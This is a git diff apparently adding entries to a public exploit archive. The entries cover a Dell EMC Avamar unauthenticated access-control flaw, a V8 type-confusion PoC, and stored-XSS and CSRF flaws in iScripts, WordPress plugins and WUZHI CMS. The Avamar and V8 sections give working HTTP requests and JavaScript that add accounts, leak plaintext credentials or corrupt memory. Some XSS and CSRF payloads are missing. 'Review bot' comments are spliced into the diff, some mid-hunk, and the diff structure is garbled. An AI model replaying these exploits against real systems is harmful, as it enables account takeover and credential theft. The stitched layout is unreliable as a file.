diff --git a/exploits/linux/webapps/44441.txt b/exploits/linux/webapps/44441.txt
new file mode 100644
index 000000000..763a193da
--- /dev/null
+++ b/exploits/linux/webapps/44441.txt
@@ -0,0 +1,143 @@ +# Exploit Title: [Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability (DSA-2018-025)] +# Date: [24/11/2017] +# Exploit Author: [SlidingWindow] +# Vendor Homepage: [https://store.Dell EMC.com/en-us/AVAMAR-PRODUCTS/Dell-DELL EMC-Avamar-Virtual-Edition-Data-Protection-Software/p/DELL EMC-Avamar-Virtual-Edition] +# Version: [Dell EMC Avamar Server 7.3.1 , Dell EMC Avamar Server 7.4.1, Dell EMC Avamar Server 7.5.0, Dell EMC Integrated Data Protection Appliance 2.0, Dell EMC Integrated Data Protection Appliance 2.1] +# Tested on: [Dell EMC Avamar Virtual Edition version 7.5.0.183] +# CVE : [CVE-2018-1217] + +================== +#Product:- +================== +EMC Avamar Virtual Edition is great for enterprise backup data protection for small and medium sized offices. EMC Avamar Virtual Edition is optimized for backup and recovery of virtual and physical servers,enterprise applications,remote offices,and desktops or laptops. + +================== +#Vulnerability:- +================== +Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability (DSA-2018-025) + +======================== +#Vulnerability Details:- +======================== + +===================================================================================================================================================== +1. Missing functional level access control allows an unauthenticated user to add DELL EMC Support Account to the Installation Manager (CVE-2018-1217) +===================================================================================================================================================== + +DELL EMC Avamar fails to restrict access to Configuration section that let Administrators set up Installation Manager configurations, or check for new packages from the Online Support site. 
An unauthenticated, remote attacker could add an Online Support Account for DELL EMC without any user interaction. + +#Proof-Of-Concept: +------------------ +1. Send following request to the target: + +POST /avi/avigui/avigwt HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: text/x-gwt-rpc; charset=utf-8 +X-GWT-Permutation: 8EGHBE4312AFBC12325324123DF4545A +X-GWT-Module-Base: https:///avi/avigui/ +Referer: https:///avi/avigui.html +Content-Length: 452 +Connection: close + +7|0|7|https:///avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|saveLDLSConfig|java.lang.String/2004016611||{"proxyHost":null, "proxyPort":0, "useProxyAuthentication":false, "proxyUsername":null, "proxyPassword":null, "disableInternetAccess":false, "proxyEnable":false, "emcsupportUsername":"hacker", "emcsupportPassword":"hacked3", "disableLDLS":false}|1|2|3|4|3|5|5|5|6|0|7| + +2. Log into Avamar Installation Manager and navigate to Configuration tab to make sure that the user 'hacker' was added successfully. + + +========================================================================================================================================================= +2. Missing functional level access control allows an unauthenticated user to retrieve DELL EMC Support Account Credentials in Plain Text (CVE-2018-1217) +========================================================================================================================================================= + +DELL EMC Avamar fails to restrict access to Configuration section that let Administrators set up Installation Manager configurations, or check for new packages from the Online Support site. An unauthenticated, remote attacker could retrieve Online Support Account password in plain text. + +#Proof-Of-Concept: +------------------ +1. 
Send following request to the target: + +POST /avi/avigui/avigwt HTTP/1.1 +Host: +Connection: Keep-Alive +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: */* +Content-Type: text/x-gwt-rpc; charset=utf-8 +X-GWT-Permutation: 3AF662C052F0EB9D3D51649D2293F6EC +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.5 +DNT: 1 +Content-Length: 192 + + +7|0|6|https:///avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|getLDLSConfig|java.lang.String/2004016611||1|2|3|4|2|5|5|6|0| + +2. Server returns credentials in plain text: + +HTTP/1.1 200 OK +Date: Fri, 17 Nov 2017 10:46:31 GMT +Server: Jetty(9.0.6.v20130930) +Content-Type: application/json; charset=utf-8 +Content-Disposition: attachment +Content-Length: 275 +Connection: close + +//OK[1,["{\"proxyHost\":null,\"proxyPort\":0,\"useProxyAuthentication\":false,\"proxyUsername\":\"\",\"proxyPassword\":\"\",\"disableInternetAccess\":false,\"proxyEnable\":false,\"emcsupportUsername\":\"hacker\",\"emcsupportPassword\":\"hacked3\",\"disableLDLS\":false}"],0,7] + + +========================================================================================================================================================= +3. Improper validation of ëDELL EMC Customer Support passcodeí allows an authenticated user to unlock DELL EMC Support Account and download verbose logs +========================================================================================================================================================= + +DELL EMC Avamar fails to validate ëDELL EMC Customer Support passcodeí properly allowing an authenticated user to unlock the support account and view/download verbose logs. However, according to vendor, this one seems to be a vulnerability but it's an ambuious functionality instead. + +#Proof-Of-Concept: +------------------ +1. 
Try to unlock the support account with an invalid password and you get error 'Customer Support Access Denied': +2. Now send the same request again (with invalid password) and tamper the server response: + +Request: +--------- +POST /avi/avigui/avigwt HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: text/x-gwt-rpc; charset=utf-8 +X-GWT-Permutation: 3AF662C052F0EB9D3D51649D2293F6EC +X-GWT-Module-Base: https:///avi/avigui/ +Referer: https:///avi/avigui.html +Content-Length: 202 +Cookie: supo=x; JSESSIONID=9tt4unkdjjilbo072x4nji2y +Connection: close + +7|0|7|https:///avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|supportLogin|java.lang.String/2004016611||1|2|3|4|3|5|5|5|6|0|7| + + +Tampered response: +-------------------- +HTTP/1.1 200 OK +Date: Fri, 24Nov 2017 07:57:25 GMT +Server: Jetty(9.0.6.v20130930) +X-Frame-Options: SAMEORIGIN +Content-Type: application/json; charset=utf-8 +Content-Disposition: attachment +Content-Length: 21 +Connection: close + +//OK[1,["true"],0,7] + +3. This unlocks the support account and enabled the 'Log' download button. + + +=================================== +#Vulnerability Disclosure Timeline: +=================================== + +11/2017: First email to disclose the vulnerability to EMC Security Response Team. +12/2017: Vendor confirmed vulnerability#1 and vulnerability#3, and discarded vulnerability#3 stating that this is an ambigious functionaliy and not a vulnerability. +12/2017: Vendor confirmed that the fix will be released in January 2018. 
+01/2018: Vendor delayed the fix release stating that the Dell EMC IDPA is also vulnerable.0 +04/2018: Vendor assigned CVE-2018-1217 and pubished the advisory 'DSA-2018-025: Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability': http://seclists.org/fulldisclosure/2018/Apr/14 \ No newline at end of file diff --git a/exploits/multiple/dos/44442.js b/exploits/multiple/dos/44442.js new file mode 100644 index 000000000..f0d519e14 --- /dev/null +++ b/exploits/multiple/dos/44442.js 
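Review bot: Finding 3 is demonstrated only by tampering the server's `supportLogin` reply into `//OK[1,["true"],0,7]`, which shows the unlock decision is taken in the browser but does not show the server afterwards honouring a verbose-log download; without a follow-up log request that succeeds against the unmodified server, the vendor's "ambiguous functionality, not a vulnerability" position is the safer reading and the write-up should say so rather than list it alongside the two confirmed findings. The disclosure timeline also contradicts itself — `12/2017: Vendor confirmed vulnerability#1 and vulnerability#3, and discarded vulnerability#3` presumably means #1 and #2 were confirmed and #3 discarded — and `the Dell EMC IDPA is also vulnerable.0` carries a stray character. For findings 1 and 2 the absence of any `Cookie` header in the requests is the actual evidence for "unauthenticated"; keep that explicit when the entry is revised, since the finding-3 request does carry `supo` and `JSESSIONID` cookies and readers may otherwise assume a session was needed throughout.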
@@ -0,0 +1,73 @@
+/*
+I think this commit has introduced the bug: https://chromium.googlesource.com/v8/v8.git/+/9884bc5dee488bf206655f07b8a487afef4ded9b
+
+Reduction LoadElimination::ReduceTransitionElementsKind(Node* node) {
+...
+ if (object_maps.contains(ZoneHandleSet(source_map))) {
+ object_maps.remove(source_map, zone());
+ object_maps.insert(target_map, zone());
+- AliasStateInfo alias_info(state, object, source_map);
+- state = state->KillMaps(alias_info, zone());
+- state = state->AddMaps(object, object_maps, zone());
++ state = state->SetMaps(object, object_maps, zone());
+ }
+...
+}
+
+I think the "state->KillMaps(alias_info, zone());" was accidentally removed. This lack may lead CheckMap instructions to be removed incorrectly.
+
+A PoC demonstrating type confusion:
+*/
+
+function opt(a, b) {
+ b[0] = 0;
+
+ a.length;
+
+ // TransitionElementsKind
+ for (let i = 0; i < 1; i++)
+ a[0] = 0;
+
+ // CheckMap removed, type confusion
+ b[0] = 9.431092e-317; // 0x1234567
+}
+
+let arr1 = new Array(1);
+arr1[0] = 'a';
+opt(arr1, [0]);
+
+let arr2 = [0.1];
+opt(arr2, arr2);
+
+%OptimizeFunctionOnNextCall(opt);
+
+opt(arr2, arr2);
+arr2[0].x // access 0x1234566
+
+Without natives syntax:
+function opt(a, b) {
+ b[0] = 0;
+
+ a.length;
+
+ // TransitionElementsKind
+ for (let i = 0; i < 1; i++)
+ a[0] = 0;
+
+ b[0] = 9.431092e-317; // 0x1234567
+
+ // Force optimization
+ for (let i = 0; i < 10000000; i++) {
+
+ }
+}
+
+let arr1 = new Array(1);
+arr1[0] = 'a';
+opt(arr1, [0]);
+
+let arr2 = [0.1];
+opt(arr2, arr2);
+
+opt(arr2, arr2);
+arr2[0].x // access 0x1234566
\ No newline at end of file
diff --git a/exploits/php/webapps/44436.txt b/exploits/php/webapps/44436.txt
new file mode 100644
index 000000000..37292e999
--- /dev/null
+++ b/exploits/php/webapps/44436.txt
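Review bot: The file is not runnable as committed: the line `Without natives syntax:` sits outside any comment, and `function opt`, `let arr1` and `let arr2` are each declared a second time at top level, so d8 rejects the whole file with a SyntaxError before either variant executes (the `let` redeclarations alone guarantee that, with or without `--allow-natives-syntax`). Either split the two variants into separate files, or wrap the second one from `Without natives syntax:` to the final `arr2[0].x` in a `/* ... */` block and add a one-line header stating that the first variant needs `d8 --allow-natives-syntax`. The header comment should also record the V8 build the PoC was reproduced on; the only provenance given is the suspected culprit commit, which is an inference ("I think") rather than a confirmed affected range.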
@@ -0,0 +1,31 @@
+# Exploit Title: iScripts Easycreate 3.2.1 - Stored Cross-Site Scripting
+# Date: 02/04/2018
+# Exploit Author: ManhNho
+# Vendor Homepage: https://www.iscripts.com
+# Demo Page: https://www.demo.iscripts.com/easycreate/demo/
+# Version: 3.2.1
+# Tested on: Windows 10
+# Category: Webapps
+# CVE: CVE-2018-9236
+# CVE: CVE-2018-9237
+
+1. Description
+====================
+iScripts EasyCreate 3.2.1 has Stored Cross-Site Scripting in the "Site Description" and "Site Title" fields.
+
+2. PoC
+====================
+1. from "user section", access to "dashboard" and select "Created from saved items" with edit option
+2. In "edit site" action, Inject "> to "Site Description" field
+3. Save and change!! refresh and we have alert pop up!
+
+3. PoC
+====================
+1. from "user section", access to "dashboard" and select "Created from saved items" with edit option
+2. In "edit site" action, Inject "> to "Site title" field
+3. Save and change! refresh and we have alert pop up!
+
+4. References
+====================
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-9237
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-9236
\ No newline at end of file
diff --git a/exploits/php/webapps/44437.txt b/exploits/php/webapps/44437.txt
new file mode 100644
index 000000000..5876fb8c3
--- /dev/null
+++ b/exploits/php/webapps/44437.txt
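Review bot: The injection payload is missing from both PoC sections: step 2 reads `Inject "> to "Site Description" field`, so only the closing `">` of an attribute break-out survived and a reader cannot reproduce the alert the entry claims. This looks like the `<script>` tag was stripped when the text was submitted (inferred from the `">` remnant and the "alert pop up" in step 3); re-add the payload in a form that survives HTML handling, e.g. HTML-encoded or described in words. The two PoC sections differ only in the field name and could be one list that names both "Site Description" and "Site Title", with a note on which CVE maps to which field, since the header lists two CVEs without saying.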
@@ -0,0 +1,44 @@
+# Exploit Title : Activity Log Wordpress Plugin Stored Cross Site Scripting (XSS)
+# Date: 25-02-2018
+# Exploit Author : Stefan Broeder
+# Vendor Homepage: https://pojo.me
+# Software Link: https://wordpress.org/plugins/aryo-activity-log/
+# Version: 2.4.0
+# CVE : CVE-2018-8729
+# Category : webapps
+
+Description
+===========
+Activity Log is a WordPress plugin which tracks site activity. It has more than 70.000 active installations. Version 2.4.0 (and possibly the previous ones) are affected by several Stored XSS vulnerabilities.
+
+Vulnerable part of code
+=======================
+Storing the payload:
+File: aryo-activity-log/hooks/class-aal-hook-attachment.php:14. The log entry that is stored contains the result of get_the_title($post->ID), which can include HTML and is not sanitized by WordPress.
+File: aryo-activity-log/hooks/class-aal-hook-comments.php:14. The log entry that is stored contains the result of get_the_title($comment->comment_post_ID), which can include HTML and is not sanitized by WordPress.
+File: aryo-activity-log/hooks/class-aal-hook-posts.php:7. The log entry that is stored contains the result of $title = get_the_title($post), which can include HTML and is not sanitized by WordPress.
+
+Displaying the payload:
+File: aryo-activity-log/classes/class-aal-activity-log-list-table.php:209. $item->object_name is displayed without sanitization and can contain HTML tags.
+
+Impact
+======
+Arbitrary JavaScript code can be run on browser side if a user is able to create a post or upload an attachment.
+
+Exploitation
+============
+To successfully exploit this vulnerability, an attacker would have to perform any of the following:
+- Create/edit/draft/publish/trash/untrash a post with JavaScript in the title
+- Create/edit/trash/untrash/mark_as_spam/unmark_as_spam a comment on a post with JavaScript in the title
+- Add/edit/delete an attachment with JavaScript in the attachment title
+
+Regular website visitors will not have the capability to do any of these, however, possible threat actors might include:
+- A user with the role of ‘editor’ within WordPress (non-admins which are able to create content)
+- A rogue administrator among multiple administrators
+- A compromised plugin
+
+If the payload has been injected, then it will be executed once the Activity Log is viewed. This can possibly lead to stealing of CSRF nonces and creation of new (administrator) users on the WordPress instance.
+
+Solution
+========
+Update to 2.4.1
\ No newline at end of file
diff --git a/exploits/php/webapps/44439.txt b/exploits/php/webapps/44439.txt
new file mode 100644
index 000000000..d50cb20ab
--- /dev/null
+++ b/exploits/php/webapps/44439.txt
@@ -0,0 +1,42 @@
+# Exploit Title: WUZHI CMS 4.1.0 CSRF vulnerability add admin account
+# Date: 2018-04-10
+# Exploit Author: taoge
+# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
+# Software Link: https://github.com/wuzhicms/wuzhicms
+# Version: 4.1.0
+# CVE : CVE-2018-9926
+
+An issue was discovered in WUZHI CMS 4.1.0.(https://github.com/wuzhicms/wuzhicms/issues/128)
+There is a CSRF vulnerability that can add an admin account via index.php?m=core&f=power&v=add.
+After the administrator logged in, open the csrf exp page.
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/44440.txt b/exploits/php/webapps/44440.txt
new file mode 100644
index 000000000..d82236c12
--- /dev/null
+++ b/exploits/php/webapps/44440.txt
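Review bot: The "csrf exp page" that step `After the administrator logged in, open the csrf exp page.` refers to is not in the visible text — the hunk header promises 42 lines but only blank lines follow, so the auto-submitting HTML form was most likely stripped on submission. Without it the entry names only the endpoint `index.php?m=core&f=power&v=add`, which is not enough to rebuild the PoC; at minimum list the POST parameter names and values the add-admin form sends, or re-add the form HTML-encoded. It would also help to state whether the endpoint accepts the request with no CSRF token at all or merely fails to validate one, since that is what the 4.1.0 fix needs to address; the linked GitHub issue may already say so. The companion 44440.txt entry has the same gap.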
@@ -0,0 +1,56 @@
+# Exploit Title: WUZHI CMS 4.1.0 CSRF vulnerability add user account
+# Date: 2018-04-10
+# Exploit Author: taoge
+# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
+# Software Link: https://github.com/wuzhicms/wuzhicms
+# Version: 4.1.0
+# CVE : CVE-2018-9927
+
+An issue was discovered in WUZHI CMS 4.1.0.(https://github.com/wuzhicms/wuzhicms/issues/128)
+There is a CSRF vulnerability that can add a user account via index.php?m=member&f=index&v=add.
+After the administrator logged in, open the csrf exp page.
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/44443.txt b/exploits/php/webapps/44443.txt
new file mode 100644
index 000000000..ccbabd88c
--- /dev/null
+++ b/exploits/php/webapps/44443.txt
@@ -0,0 +1,33 @@
+# Exploit Title: WordPress Plugin WordPress File Upload 4.3.2 - Stored XSS
+# Date: 31/03/2018
+# Exploit Author: ManhNho
+# Vendor Homepage: https://www.iptanus.com/
+# Software Link: https://downloads.wordpress.org/plugin/wp-file-upload.zip
+# Version: 4.3.2
+# Tested on: CentOS 6.5
+# CVE : CVE-2018-9172
+# Category : Webapps
+
+1. Description
+===========
+WordPress File Upload is a WordPress plugin with more than 20.000 active
+installations.
+Version 4.3.2 (and possibly previous versions) are affected by a Stored XSS
+vulnerability in the admin panel ,related to the "Uploader Instances"
+functionality.
+
+2. Proof of Concept
+===========
+
+1. Login to admin panel
+2. Access to Wordpress File Upload Control Panel. In Uploader Instances
+function, choose and edit created Instance
+3. In Plugin ID field, inject XSS pattern such as:
+ and click Update button
+4. Access to Pages/Posts contain upload option, we got alert ManhNho
+
+3. References
+===========
+https://www.iptanus.com/new-version-4-3-3-of-wordpress-file-upload-plugin/
+https://wordpress.org/plugins/wp-file-upload/#developers
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9172
\ No newline at end of file
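Review bot: The XSS pattern is missing from step 3 of 44443.txt: `inject XSS pattern such as:` is followed by a line that begins ` and click Update button`, so the tag itself was stripped and the PoC cannot be reproduced as written; re-add it HTML-encoded. Step 4 (`Access to Pages/Posts contain upload option, we got alert ManhNho`) is the important part of the impact — the value stored by an administrator in the "Plugin ID" field renders on front-end pages, so victims are site visitors and not just admin-panel users — and deserves its own sentence in the Description, which currently says only "in the admin panel". The reference to the 4.3.3 release notes suggests that is the fixed version; if confirmed, put a "Fixed in" line in the header so the affected range is explicit.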
diff --git a/exploits/php/webapps/44444.txt b/exploits/php/webapps/44444.txt
new file mode 100644
index 000000000..844a9f00c
--- /dev/null
+++ b/exploits/php/webapps/44444.txt
@@ -0,0 +1,107 @@ +# Exploit Title: WordPress Plugin WordPress File Upload 4.3.3 - Stored XSS +# Date: 06/04/2018 +# Exploit Author: ManhNho +# Vendor Homepage: https://www.iptanus.com/ +# Software Link: https://downloads.wordpress.org/plugin/wp-file-upload.zip +# Version: 4.3.3 +# Tested on: Windows 7 / Cent OS 6.5 +# CVE : CVE-2018-9844 +# Category : Webapps + +Description +=========== +WordPress File Upload is a WordPress plugin with more than 20.000 active +installations. +Version 4.3.3 (and possibly previous versions) are affected by a Stored XSS +vulnerability in the admin panel ,related to the "Edit_Setting" +functionality. + + +PoC +=============== +Request: + +POST /wp-admin/options-general.php?page=wordpress_file_upload&action=edit_settings +HTTP/1.1 +Host: 192.168.1.66 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 +Firefox/59.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://192.168.1.66/wp-admin/options-general.php?page= +wordpress_file_upload&action=plugin_settings +Content-Type: multipart/form-data; boundary=--------------------- +------27678165033834 +Content-Length: 906 +Cookie: wordpress_ce39b1fa1561a0e8d46e02ff9e65f6a0=admin%7C1523124759% +7CYpPsz6ePz7L52pKrUk6uFioJlynhadnrSuv2lKQNhJe%7Ca3c7a75afaaf9ce1db3596b8aa83 +3adeb337f313ef5156fbf93096c1af0cdbbc; wp-settings-1=libraryContent%3Dbrowse; +wp-settings-time-1=1522504284; PHPSESSID=o6smfv1u6p8rh7cu7v7gl9lm47; +wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_ +ce39b1fa1561a0e8d46e02ff9e65f6a0=admin%7C1523124759% +7CYpPsz6ePz7L52pKrUk6uFioJlynhadnrSuv2lKQNhJe%7C1993c93121805782b8bee82cd013 +6f1a6aa286d4294ed58cb6f95539acdfe5d5 +Connection: close +Upgrade-Insecure-Requests: 1 + +-----------------------------27678165033834 +Content-Disposition: form-data; name="_wpnonce" + +c9d5733e36 +-----------------------------27678165033834 
+Content-Disposition: form-data; name="_wp_http_referer" + +/wp-admin/options-general.php?page=wordpress_file_upload& +action=plugin_settings +-----------------------------27678165033834 +Content-Disposition: form-data; name="action" + +edit_settings +-----------------------------27678165033834 +Content-Disposition: form-data; name="wfu_basedir" + + +-----------------------------27678165033834 +Content-Disposition: form-data; name="wfu_postmethod" + +fopen +-----------------------------27678165033834 +Content-Disposition: form-data; name="wfu_admindomain" + +siteurl +-----------------------------27678165033834 +Content-Disposition: form-data; name="submitform" + +Update +-----------------------------27678165033834-- + +Response: + +HTTP/1.1 200 OK +Date: Thu, 05 Apr 2018 18:15:01 GMT +Server: Apache/2.2.15 (CentOS) +X-Powered-By: PHP/5.3.3 +Expires: Wed, 11 Jan 1984 05:00:00 GMT +Cache-Control: no-cache, must-revalidate, max-age=0 +Pragma: no-cache +X-Frame-Options: SAMEORIGIN +Referrer-Policy: same-origin +Connection: close +Content-Type: text/html; charset=UTF-8 +Content-Length: 28623 +... + + +

Current value: